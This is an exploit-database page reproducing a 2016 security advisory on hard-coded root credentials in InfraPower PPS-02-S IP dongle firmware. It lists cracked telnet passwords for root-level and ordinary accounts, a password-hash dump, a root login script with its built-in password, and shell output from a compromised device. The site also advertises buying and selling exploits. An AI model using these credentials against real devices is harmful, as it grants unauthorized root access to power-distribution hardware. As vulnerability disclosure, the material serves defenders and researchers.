0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials Vulnerability
[InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
27.09.2016
--
# cat /etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
# showing accounts in root group:
Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311
# showing other less-privileged accounts:
Username: user
Password: 8475
--
Username: admin
Password: 8475
--------
/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh
#!/bin/sh
trap "" 2 3 9 24
# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
if [ "$passWork" = "1" ]; then
login_file=/mnt/mtd/root_login
now_timestamp=`date +%s`
if [ -f $login_file ]; then
line=`wc -l $login_file | cut -c 1-9`
if [ "$line" != " 0" ] && [ "$line" != " 1" ] && [ "$line" != " 2" ]; then
pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
pre_result1=`echo $pre_login | cut -d " " -f 1`
pre_result2=`echo $pre_login | cut -d " " -f 2`
pre_result3=`echo $pre_login | cut -d " " -f 3`
if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
if [ "$result" != "success" ]; then
echo $result
exit 0
fi
fi
fi
fi
echo -n "password:"
read pass
if [ "$pass" != "999" ]; then
echo "wrong password"
echo fail $now_timestamp >> $login_file
exit 0
fi
echo success $now_timestamp >> $login_file
fi
/bin/sh
/mnt/mtd #
--------
/mnt/mtd # ls
IMG001.exe boot.old.sh load_config.log main_conf net_conf passwd_conf snmp_conf web_conf
PDU3_ini box_conf log_memCheck.txt main_conf.bak net_conf.old port_conf snmpd.conf
PDU3_pol info.zip mac_addr me_login ntp_conf private start_service.log
--------
/mnt/mtd # df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 256.0M 4.0K 256.0M 0% /tmp
/dev/mtdblock1 1.4M 96.0K 1.3M 7% /mnt/mtd
/dev/mtdblock5 1.0M 60.0K 964.0K 6% /mnt/mtd1
/dev/mtdblock6 1.0M 60.0K 964.0K 6% /mnt/mtd2
/dev/mtdblock7 1.0M 60.0K 964.0K 6% /mnt/mtd3
--------
/www # ls -al
drwxr-xr-x 5 1013 1014 0 Jan 13 08:41 .
drwxr-xr-x 16 root root 0 Nov 28 11:17 ..
-rwxr--r-- 1 1013 1014 6875 Apr 22 2014 CSSSource.php
-rwxr--r-- 1 1013 1014 291 Apr 22 2014 Config.php
-rwxr--r-- 1 1013 1014 1685 Apr 22 2014 ConnPort.php
-rwxr--r-- 1 1013 1014 5787 Apr 22 2014 FWUpgrade.php
-rwxr--r-- 1 1013 1014 7105 Apr 22 2014 Firmware.php
-rwxr--r-- 1 1013 1014 10429 Apr 22 2014 Function.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 General
-rwxr--r-- 1 1013 1014 1407 Apr 22 2014 Header.php
-rwxr--r-- 1 1013 1014 6775 Apr 22 2014 IPSettings.php
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 Images
drwxr-xr-x 2 1013 1014 0 Apr 22 2014 JavaScript
-rwxr--r-- 1 1013 1014 408 Apr 22 2014 JavaSource.php
-rwxr--r-- 1 1013 1014 849 Apr 22 2014 ListFile.php
-rwxr--r-- 1 1013 1014 12900 Apr 22 2014 Login.php
-rwxr--r-- 1 1013 1014 355 Apr 22 2014 Logout.php
-rwxr--r-- 1 1013 1014 352 Apr 22 2014 Main_Config.php
-rwxr--r-- 1 1013 1014 5419 Apr 22 2014 Menu.php
-rwxr--r-- 1 1013 1014 942 Apr 22 2014 Menu_3.php
-rwxr--r-- 1 1013 1014 4491 Apr 22 2014 Ntp.php
-rwxr--r-- 1 1013 1014 23853 Apr 22 2014 OutletDetails.php
-rwxr--r-- 1 1013 1014 1905 Apr 22 2014 OutletDetails_Ajax.php
-rwxr--r-- 1 1013 1014 48411 Apr 22 2014 PDUDetails.php
-rwxr--r-- 1 1013 1014 4081 Apr 22 2014 PDUDetails_Ajax_Details.php
-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
# 0day.today [2024-11-16] #